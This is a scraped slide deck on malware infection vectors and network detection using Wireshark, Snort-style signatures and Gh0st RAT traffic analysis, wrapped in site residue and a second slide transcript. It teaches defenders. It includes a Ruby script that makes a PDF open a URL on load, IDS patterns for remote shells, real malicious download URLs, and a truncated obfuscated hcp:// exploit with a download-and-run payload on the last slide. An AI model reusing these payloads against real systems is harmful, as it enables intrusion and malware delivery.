An Intel company

‘Taming Worms, RATs, Dragons, Zombies & More….’

By Christiaan Beek
Agenda

•   whoami
•   The game has changed
•   How malware enters your network
•   What goes wrong
•   Wireshark Kung-Fu
•   Countermeasures
•   Resources & credits
•   Wrap up

LEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this presentation.
> whoami

•   Christiaan Beek
•   Principal Architect
•   Foundstone EMEA IR & Forensics
•   Developer/Instructor MFIRE
The game has changed

[Figure: attack-surface map covering Manufacturing, Medical device, Energy, Database, SCADA, Mobile, Embedded, Smart cars, ATM/Kiosk, Entertainment, RF/IR, Bluetooth, Web, Virtual, Apps, Social media and Silicon, annotated with the RSA, DuQu, Night Dragon, Stuxnet, Aurora and Zeus attacks]
The game has changed

[Chart: Total Malware Samples, y-axis from 0 to 70,000,000]

McAfee threat landscape Q2 report
Some statistics

The Gulf region is gaining the interest of malware authors:

• Number of internet users growing
• Windows XP most used OS
• Vulnerable IE or PDF readers
Some statistics

Did you know:

• Internet Explorer 6 has more than 473 publicly known vulnerabilities

• So…..
Some statistics

 http://www.ie6countdown

Some statistics

 Unpatched Windows XP + IE 6 =
Some statistics

  Gulf region Malware spread vs Global

Source: ThreatExpert & McAfee labs
Some statistics – Most detected malware

Iran: Backdoor.Win32.Rbot, Mal/VBInject-D, P2P-Worm.Win32.Malas.h, Trojan-PWS., Win32.Sality., Win32.Virut.Gen., Worm.P2P.Malas, Worm:Win32/Autorun.NI
Iraq: Gen.Application, Mal/VB-G, Malware.Virut, PWS-RedNeck, Trojan-Dropper, Trojan-Spy.Win32.Agent.awkh, W32/Scribble-B
Lebanon: Virus.Win32.Virut.ce, W32.Virut.CF, W32/Scribble-B, W32/Virut.n.gen, Win32.SuspectCrc
Jordan: Backdoor.Trojan, Generic PWS.y, Infostealer.Snatch, Trojan-Downloader.Win32.VB.tty, Trojan-PSW.Win32.FakeAIM.e, TSPY_FAKEAIM.E, VirTool.Win32.AttackerDown.11, W32/Virut.n.gen
Oman: Backdoor.Win32, Trojan-GameThief.Win32.Lmir, Trojan-Spy.Win32.Banker.gaa, Virus.Win32.Parite.b, Virus.Win32.Sality.r, Virus.Win32.Virut.ce, W32.Gammima.AG, W32.Spybot.Worm
Kuwait: Backdoor.Evilbot, P2P-Worm.Win32.SpyBot.gen, W32.Spybot.Worm, Worm.Akbot.Gen
Israel: Backdoor.Win32.IRCBot.hjd, Trojan.FakeAlert, W32/Koobface.worm.gen, W32/Sdbot.worm, W32/Spybot.worm.gen, Win32.Sality, Win32.Virut.Gen, Worm.RBot.Gen.16, WORM_AUTORUN.XA
Syria: Trojan-Spy.Win32.Banbra, Virus.Win32.Alman.b, Virus.Win32.Sality.l, Virus.Win32.Virut, W32/Autorun.worm, W32/Sality-AI, W32/Virut.n.gen, WORM_AUTORUN.YN
Saudi Arabia: Backdoor.IRC.Bot, Malware.Harakit, Malware.Virut, PE_PARITE.A, W32/Autorun.worm, W32/Mabezat, W32/Sality.gen, W32/ZBot
United Arab Emirates: Backdoor.Win32.VB.fhx, HackTool.VB!sd6, Trojan-Dropper.Agent, TrojanDropper:Win32/VB.HE, Trojan-PWS.Win32.VB, TrojanSpy:Win32/Vwealer.CG, Virus.Win32.Sality, Worm.IM.Sohanad
Yemen: Backdoor.Win32.Cakl.a, IRC Trojan, Mal/TinyDL-T, Trojan.IRCBot, Trojan.Win32.Vilsel.sxw

Source: ThreatExpert & McAfee labs
Some statistics – Most detected malware

      "The next slide contains
         scenes that some
    color-blind people may find
              disturbing"
What happened in Qatar?

Source: http://blogs.technet.com/b/security/archive/2011/11/22/the-curious-case-of-qatar.aspx
How malware enters your network

Hint:

  ‘ it is between the keyboard and the chair ’
How malware enters your network

Top infection vectors:

• Users browsing websites which have been infected, with no outward sign of the compromise

• Opening attachments

• Or:
How malware enters your network

User clicks on a link

OR…

User opens a PDF
How malware enters your network

                     With a little effort……

   # Create a simple PDF document with Origami (Ruby PDF library)
   require 'origami'
   include Origami

   contents = ContentStream.new
   contents.write 'Black Hat Sneak Peek',
     :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15
   PDF.new.append_page(Page.new.setContents(contents)).save('Sneak peek.pdf')

   # Re-open the file and attach an action that fires as soon as the document is opened
   pdf = PDF.read("Sneak peek.pdf")
   pdf.onDocumentOpen Action::URI.new('http://securitybananas.com')
   pdf.save('Sneak peek bhatpdf')
How malware enters your network

After x redirects: script executed: grab info
How malware enters your network

Info sent:
Browser version
Operating System
Adobe version
Flash version
Java version
Etc.
How malware enters your network

   var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0];
   try {var PluginDetect = {handler : function (c, b, a){return function (){c(b, a)}

   [………….]

   initScript:function(){var c=this,a=navigator,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.OS=100;if(b){var
   f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win. *
   CE",22.1,"Win. * Mobile",22.2,"Pocket  s * PC",22.3,"
How malware enters your network

Info gathered:
Browser version
Operating System
Adobe version
Flash version
Java version
Etc.

How malware enters your network

C&C server
How malware traffic hides

  ► Techniques used to hide traffic:

  • Disguising malicious traffic as web traffic

  • Shortened or encoded URLs

  • IRC over HTTP
What goes wrong?

Problem #1

  ► Many solutions, but how to use them?

  ► Education?

Problem #2

  ► No malware strategy

  ► Focus on the end-point

  ► But what is your end-point nowadays?

Problem #3

  ► No layered (malware) defense

  ► Traffic streams unclear

Problem #4

  ► How does malware work?

  ► How to recognize patterns & correlate?

So....
Wireshark Kung-Fu

Custom /targeted malware

   ► Some recent samples of malware:

   •   Spreading: shares, USB media, .exe infections
   •   Search for Autocomplete information
   •   Search for specific accounts
   •   Keylogger
   •   Created task to check if keylogger was running
   •   Masked in DLL files
   •   Upload results to FTP servers
Custom /targeted malware

   ► IEAutocomplete:

   Type: 89c39569
      Subtype: 0xf111f3e
           Unknown: 89c39569: [IdentitiesPass]=[,,,,$#„#Œ]
   Type: e161255a
      Subtype: 0xe161255a
           IE AutoComplete: [address]=[Street ********* ,]
           IE AutoComplete: [ini_tmp]=[pa*******]
           IE AutoComplete: [name]=[p********]
           IE AutoComplete: [num]=[01*********]
           IE AutoComplete: [p0]=[******ADMIN]
           IE AutoComplete: [rech]=[SY*******]
           IE AutoComplete: [username]=[22*********]
Custom /targeted malware

   ► As mentioned before, traffic is hidden using:

   •   HTTP(S)
   •   FTP (traffic increase)
   •   IRC
   •   TCP 445 (traffic increase)
   •   TCP 53 (DNS)
   •   Compression of traffic

   Used for downloading payloads, uploading information, and command & control.

Custom /targeted malware

 ► Arming for detection
Wireshark

   Which filters can be used?

   First: tcp.dstport == 80 and http contains "GET"

   After analyzing this output, fine-tune the filter:

   tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
Wireshark

  ► Which filters can be used?

  DNS queries:
  dns contains "ru" or dns contains "cn" or dns contains "biz" or dns contains "dyndns.org" or dns contains "cc"

  (contains matches the substring anywhere in the DNS layer, so a name such as virus.example also hits "ru"; treat the filter as a starting point and narrow it down from there.)
T-shark

  ► T-shark: command line:

Wireshark

  ► Example of Morto:
Custom /targeted malware

  ► Chinese Gh0st RAT

  • Full analysis by Foundstone’s Michael G. Spohn
  • Example of a Chinese RAT used in several campaigns
  • Research project to understand how it works

Custom /targeted malware

  ► Network analysis of Chinese Gh0st RAT

  • Command & Control (C2) packets consist of:

  1. A five byte packet header that contains the characters ‘Gh0st’.
  2. A four byte integer that contains the size in bytes of the entire packet.
  3. A four byte integer that contains the size in bytes of the entire packet when uncompressed.
  4. A variable sized packet that contains the packet payload. The client sends small requests that contain commands, and the server responds to those commands with the requested data.
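The framing in the four points above, as an added example that is not part of the slides or of Michael Spohn's analysis: a small Python parser that splits a reassembled TCP stream into Gh0st packets, checks the ‘Gh0st’ magic, decompresses the body and cross-checks both size fields, flagging a packet whose announced uncompressed size does not match what came out. That the body is zlib-compressed, that the size fields are little-endian, and every token name other than 102 = login are assumptions; the login packet bytes are constructed.

```python
import struct
import zlib

MAGIC = b"Gh0st"             # five-byte header named on the slide
HEADER_LEN = 5 + 4 + 4       # magic + total size + uncompressed size

# 102 (0x66) is the login token the slides look up in the RAT's command
# table; only that one is mapped here, everything else reports as UNKNOWN.
TOKEN_NAMES = {102: "LOGIN"}


def build_packet(payload: bytes) -> bytes:
    """Frame a payload the way the slides describe.

    Assumption: the body is zlib-compressed and both size fields are
    little-endian 32-bit integers (x86 C ints).
    """
    body = zlib.compress(payload)
    total = HEADER_LEN + len(body)
    return MAGIC + struct.pack("<II", total, len(payload)) + body


def parse_stream(data: bytes):
    """Split a reassembled TCP stream into Gh0st packets.

    Returns (packets, leftover). Each packet is a dict with the stream
    offset, the first payload byte (the token), its name, the decompressed
    payload and a list of sanity-check problems. 'leftover' holds the bytes
    of a packet whose announced length has not fully arrived yet.
    Raises ValueError when a packet boundary does not carry the magic, i.e.
    this is not (or no longer) a Gh0st conversation.
    """
    packets = []
    pos = 0
    while pos + HEADER_LEN <= len(data):
        if data[pos:pos + 5] != MAGIC:
            raise ValueError(f"no Gh0st magic at stream offset {pos}")
        total, uncompressed = struct.unpack_from("<II", data, pos + 5)
        if total < HEADER_LEN:
            raise ValueError(f"bogus total size {total} at offset {pos}")
        if pos + total > len(data):
            break                                  # wait for more bytes
        body = data[pos + HEADER_LEN:pos + total]
        problems = []
        try:
            payload = zlib.decompress(body)
        except zlib.error as exc:                  # body is not valid zlib
            payload = b""
            problems.append(f"zlib: {exc}")
        if len(payload) != uncompressed:
            problems.append(
                f"header says {uncompressed} uncompressed bytes, got {len(payload)}")
        token = payload[0] if payload else None
        packets.append({
            "offset": pos,
            "token": token,
            "token_name": TOKEN_NAMES.get(token, "UNKNOWN"),
            "payload": payload,
            "problems": problems,
        })
        pos += total
    return packets, data[pos:]


# Constructed sample: one client login packet (token 0x66 = 102) followed by
# the first seven bytes of a second packet, as in a capture cut mid-packet.
LOGIN_PACKET = build_packet(bytes([0x66]) + b"<constructed LoginInfo fields>")
SAMPLE_STREAM = LOGIN_PACKET + LOGIN_PACKET[:7]

if __name__ == "__main__":
    found, pending = parse_stream(SAMPLE_STREAM)
    for p in found:
        print(f"offset {p['offset']}: token {p['token']} ({p['token_name']}), "
              f"{len(p['payload'])} payload bytes, problems={p['problems']}")
    print(f"{len(pending)} bytes waiting for the rest of the next packet")
```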
Custom /targeted malware

  ► Example of commands

  • 50 commands used

  ► Example of token codes

  • Used by server to identify payloads to client

  ► Example of login packet

  ► Uncompressing the login payload:

  First byte 66 (0x66 = 102)

  ► Lookup 102 in RAT’s command value table:

  ► Uncompressing the login payload:

  C0 A8 01 E0 = 192.168.1.249 (host ip-address)

  ► Uncompressing the login payload:

  ’01’ – in this case means a webcam is present on client

  ► For the RE die-hards:

  Gh0st RAT LoginInfo structure
Wireshark filter

  ► Chinese Gh0st RAT

  - filter: "\x47\x68\x30\x73\x74"   (the bytes of the string Gh0st)
Wireshark

  ► NETBIOS traffic

Wireshark

   ► Traffic regarding TCP 445 (shares, SMB)

   Incoming file share access attempts (both address bounds must hold, so the two terms are combined with and, not or):

   smb.cmd && ip.dst > <internal network address> && ip.dst < <internal network broadcast address>

Wireshark

   ► SMB worm creating .exe on share:

   smb.create.action == 2 and smb.file contains "exe"

   ► SMB .exe detection:

   In old days: smb.file contains "exe"

   Taddong developed a tool to capture SMB file transfers in Wireshark

   But… good news

   It’s now integrated in Wireshark Version 1.5.1 (Dev)

   File > Export > Objects > SMB

   DEMO
COUNTERMEASURES

 Training &
Education!!!!!
Countermeasures

   ► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet):

   RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|"

   TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|"

   VNC = "|52 46 42 20 30 30 33 2e 30 30|"

Countermeasures

   ► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls:

   CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|";

   ► Implement new signatures in IDS/DLP as they are learned
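The RDP/VNC and CMD signatures on the two slides above, as an added example that is not part of the deck: Python that converts the Snort-style content strings (literal text outside |...|, hex bytes inside) to raw bytes and runs them over the first bytes of a few sessions, so you can see what each rule actually matches before loading it into an IDS. The session payloads are constructed, not captured.

```python
# Signatures copied from the countermeasures slides, in Snort content syntax.
SIGNATURES = {
    "RDP cookie (mstshash)":    '|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|',
    "TPKT/X.224 (RDP) request": '|03 00 00 0b 06 e0|',
    "TPKT (RDP) pattern 2":     '|b8 e5 0d 3d 16 00|',
    "VNC RFB banner":           '|52 46 42 20 30 30 33 2e 30 30|',
    "CMD prompt C:\\":          '|0a 0a|C|3a 5c|',
    "CMD prompt C:\\WINDOWS\\": '|0a 0a|C|3a 5c|WINDOWS|5c|',
}


def snort_content_to_bytes(content: str) -> bytes:
    """Convert one Snort-style content string into the raw bytes it matches."""
    parts = content.split("|")
    if len(parts) % 2 == 0:
        raise ValueError(f"unbalanced '|' in content string: {content!r}")
    out = bytearray()
    for i, part in enumerate(parts):
        if i % 2 == 0:
            out += part.encode("latin-1")   # literal text between hex runs
        else:
            out += bytes.fromhex(part)      # hex run; fromhex ignores the spaces
    return bytes(out)


def match_signatures(payload: bytes) -> list:
    """Names of every signature whose byte pattern occurs anywhere in payload."""
    return [name for name, content in SIGNATURES.items()
            if snort_content_to_bytes(content) in payload]


def scan_sessions(sessions: dict) -> dict:
    """Run all signatures over a {session_id: first_payload_bytes} table."""
    return {sid: match_signatures(data) for sid, data in sessions.items()}


# Constructed sample payloads (first bytes of a session), not captured data.
SAMPLE_SESSIONS = {
    # minimal X.224 connection request: TPKT length 0x0b, no cookie
    "10.0.0.7:51000->3389": b"\x03\x00\x00\x0b\x06\xe0\x00\x00\x00\x00\x00",
    # connection request carrying the mstshash cookie (TPKT length 0x21)
    "10.0.0.8:51001->3389": b"\x03\x00\x00\x21\x1c\xe0\x00\x00\x00\x00\x00"
                            b"Cookie: mstshash=bob\r\n",
    # VNC server greeting; the slide's pattern matches any 003.00x version
    "10.0.0.9:5900<-":      b"RFB 003.008\n",
    # shell banner with bare LF line endings, as the CMD patterns expect
    "10.0.0.10:4444->":     b"Microsoft Windows XP [Version 5.1.2600]\n\nC:\\WINDOWS\\system32>",
    # ordinary HTTP; should not match anything
    "10.0.0.11:52000->80":  b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
}

if __name__ == "__main__":
    for name, content in SIGNATURES.items():
        print(f"{name}: {snort_content_to_bytes(content)!r}")
    for sid, hits in scan_sessions(SAMPLE_SESSIONS).items():
        print(f"{sid}: {hits}")
```

Both CMD patterns need the two LF bytes (0a 0a) back to back, so a banner using CRLF line endings would not hit; check the line endings in your own traffic before relying on them.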
Countermeasures

   ► Detect services on non-standard ports

   ► Nmap the internal network:

     nmap -sS -p <ports> -oG results.nmap <IP or subnet range>

   ► Probe discovered ports with Amap:

     amap -A -b -o out.amap <IP> <port> <port> ...

     or use the results.nmap file as input
Countermeasures

   ► Implement IDS/HIPS/DLP rules to detect outbound GET requests:

   Files by type (.exe, .bat, .dll etc.) in URL:

    GET http://scan28.dosmokes.ce.ms/InstallSystemDefender_133.bin HTTP/1.0

    GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.45094.exe HTTP/1.1

Countermeasures

   ► Implement IDS/HIPS/DLP rules to detect encoded URL extensions:

   GET
      http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E6
      4636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166
      E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F2
      7212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D
      442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3
      BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989 781DF9F9E969C8BCDC1D4
      DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1
      A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
Countermeasures

   ► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions:

   GET http://65.75.156.141/Home/d.php?f=16&e=about.exe HTTP/1.1

   GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm91dC5leGU== HTTP/1.1
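The three GET-detection slides above (file type in the URL, long hex-encoded parameter, base64-encoded parameter), as an added example that is not part of the deck: a Python checker run over the request lines from the slides plus one constructed line. It decodes the base64 parameter back to 16&e=about.exe, which is what the plain request on the slide before it carried. The hex-length threshold, the extensions beyond .exe/.bat/.dll/.bin, the printable-ASCII test and the lenient base64 padding are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# .exe, .bat and .dll are named on the slide and .bin appears in its first
# request; the remaining extensions are an assumption.
EXEC_EXTENSIONS = (".exe", ".bat", ".dll", ".bin", ".scr", ".com", ".vbs")
HEX_MIN_LEN = 64                     # assumed threshold for a "long" hex blob
GET_LINE = re.compile(r"^GET\s+(\S+)\s+HTTP/\d\.\d$")


def ends_with_exec(value: str) -> bool:
    return value.lower().endswith(EXEC_EXTENSIONS)


def looks_hex(value: str) -> bool:
    return len(value) >= HEX_MIN_LEN and re.fullmatch(r"[0-9A-Fa-f]+", value) is not None


def try_base64(value: str):
    """Decode a parameter as base64, tolerating wrong padding (the slide's
    value ends in a double '='); None if it is not base64 or does not decode
    to printable ASCII."""
    body = value.rstrip("=")
    if len(body) < 8 or re.fullmatch(r"[A-Za-z0-9+/]+", body) is None:
        return None
    try:
        raw = base64.b64decode(body + "=" * (-len(body) % 4), validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def inspect_get(line: str) -> list:
    """Findings for one 'GET <url> HTTP/x.y' line as (reason, detail) tuples."""
    m = GET_LINE.match(line.strip())
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = []
    if ends_with_exec(url.path):
        findings.append(("executable in URL path", url.path.rsplit("/", 1)[-1]))
    # split the query by hand: parse_qs would turn '+' into a space and break base64
    for pair in filter(None, url.query.split("&")):
        key, _, value = pair.partition("=")
        if ends_with_exec(value):
            findings.append(("executable in query parameter", f"{key}={value}"))
        elif looks_hex(value):
            findings.append(("long hex-encoded parameter", f"{key}=<{len(value)} hex chars>"))
        else:
            decoded = try_base64(value)
            if decoded and any(ext in decoded.lower() for ext in EXEC_EXTENSIONS):
                findings.append(("base64 parameter hiding executable",
                                 f"{key}={value} -> {decoded}"))
    return findings


# Request lines from the slides, plus one constructed line that mimics the
# hex-encoded get2.php request with a made-up, shortened value and host.
SAMPLE_REQUESTS = [
    "GET http://scan28.dosmokes.ce.ms/InstallSystemDefender_133.bin HTTP/1.0",
    "GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.45094.exe HTTP/1.1",
    "GET http://65.75.156.141/Home/d.php?f=16&e=about.exe HTTP/1.1",
    "GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm91dC5leGU== HTTP/1.1",
    "GET http://host.invalid/get2.php?c=PXWSQSZT&d="
    + "26606B67393230312E64636F317E3E3D" * 3 + " HTTP/1.1",
    "GET http://host.invalid/index.html HTTP/1.1",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        for reason, detail in inspect_get(req):
            print(f"{reason}: {detail}")
```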
Wrap up

  ► What have you learned?

  • The game has changed
  • Malware uses all kinds of ways to hide itself
  • Many tools to detect malware
  • But….
  • Invest in learning the tools and how malware works
  • Define a defense-in-depth malware strategy
  • Create awareness
  • Educate administrators AND management AND users
Resources & credits

  ► Resources
  •   Wireshark (http://www.wireshark.org)
  •   Snort (http://www.sourcefire.com)
  •   Nmap (http://www.insecure.org)
  •   Amap (http://www.thc.org/thc-amap/)

  ► Special thanks to
  • Michael G. Spohn
  • Shane Shook
  • Tony Lee
  • Carric Dooley
Shukran/Thank you!

 ► Keep in touch:

 •   Christiaan_Beek @McAfee dot com

 ► Twitter:
 •   @FSEMEA
 •   @Foundstone
 •   @ChristiaanBeek
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

Taming worms, rats, dragons & more

  • 1. An Intel company ‘Taming Worms, RATs, Dragons, tjombies & More….’ By Christiaan Beek
  • 2. Agenda
      • whoami
      • The game has changed
      • How malware enters your network
      • What goes wrong
      • Wireshark Kung-Fu
      • Countermeasures
      • Resources & credits
      • Wrap up
      LEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this presentation.
  • 3. > whoami
      • Christiaan Beek
      • Principal Architect
      • Foundstone EMEA IR & Forensics
      • Developer/Instructor MFIRE
  • 4. The game has changed (word cloud of attack surfaces and incidents: manufacturing, medical device, energy, database, SCADA, mobile, embedded, RSA, DuQu, silicon, smart cars, Night Dragon, Stuxnet, social media, Aurora, Zeus, ATM/kiosk, apps, entertainment, virtual, RF/IR, web, Bluetooth)
  • 5. The game has changed (chart: total malware samples, scale 0 to 70,000,000; source: McAfee threat landscape Q2 report)
  • 6. The game has changed
  • 7. Some statistics. The Gulf region is gaining interest from malware authors:
      • Number of internet users growing
      • Windows XP most used OS
      • Vulnerable IE or PDF readers
  • 8. Some statistics. Did you know:
      • Internet Explorer 6 has more than 473 publicly known vulnerabilities
      • So…..
  • 9. Some statistics: http://www.ie6countdown
  • 10. Some statistics: Unpatched Windows XP + IE 6 =
  • 11. Some statistics: Gulf region malware spread vs global. Source: ThreatExpert & McAfee labs
  • 12. Some statistics – Most detected malware (map of the Gulf region with the most detected families per country; the extraction lost the grouping by country, so the names are listed as extracted): Iran Iraq: Lebanon: Jordan: Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.Trojan Mal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.y P2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.Snatch Trojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan- Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.tty Win32.Virut.Gen. Trojan- Trojan- Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.e Worm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11 Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.gen Trojan- Backdoor.Evilbot W32/Spybot.worm.gen GameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria: Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.Banbra Virus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.b Virus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.l Virus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.Virut W32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.worm W32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.A Backdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.worm IRC Trojan TrojanSpy:Win32/Vwealer.CG W32/Mabezat Mal/TinyDL-T Virus.Win32.Sality W32/Sality.gen Trojan.IRCBot Worm.IM.Sohanad W32/ZBot Trojan.Win32.Vilsel.sxw. Source: ThreatExpert & McAfee labs
  • 13. Some statistics – Most detected malware: "The next slide contains scenes that some color-blind people may find disturbing"
  • 14. Some statistics – Most detected malware: the same per-country map as slide 12, color-coded by family
  • 15. What happened in Qatar? Source: http://blogs.technet.com/b/security/archive/2011/11/22/the-curious-case-of-qatar.aspx
  • 17. How malware enters your network. Hint: ‘it is between the keyboard and the chair’
  • 18. How malware enters your network. Top infection vectors:
      • Users browsing websites which have been infected with no outward sign of the compromise
      • Open attachments
      • Or:
  • 19. How malware enters your network: User clicks on link
  • 20. How malware enters your network: OR… User opens a PDF
  • 21. How malware enters your network: With a little effort…… (Ruby, using the Origami PDF library; the slide's typographic quotes and the output filename are made consistent so the script runs as written)
      require 'origami'
      include Origami

      # Create a simple PDF document with Origami
      contents = ContentStream.new
      contents.write 'Black Hat Sneak Peek', :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15
      PDF.new.append_page(Page.new.setContents(contents)).save('Sneak peek.pdf')

      # Reopen the document and attach an action that is triggered when it is opened
      pdf = PDF.read('Sneak peek.pdf')
      pdf.onDocumentOpen Action::URI.new('http://securitybananas.com')
      pdf.save('Sneak peek bhat.pdf')
  • 22. How malware enters your network: After x redirects: script executed: grab info
  • 23. How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp:// system/sysinfo/sysinfomain.htm%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47 ,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3 4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,1 06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72, 84,84,80,34,41,58,46,111,112,101,110,
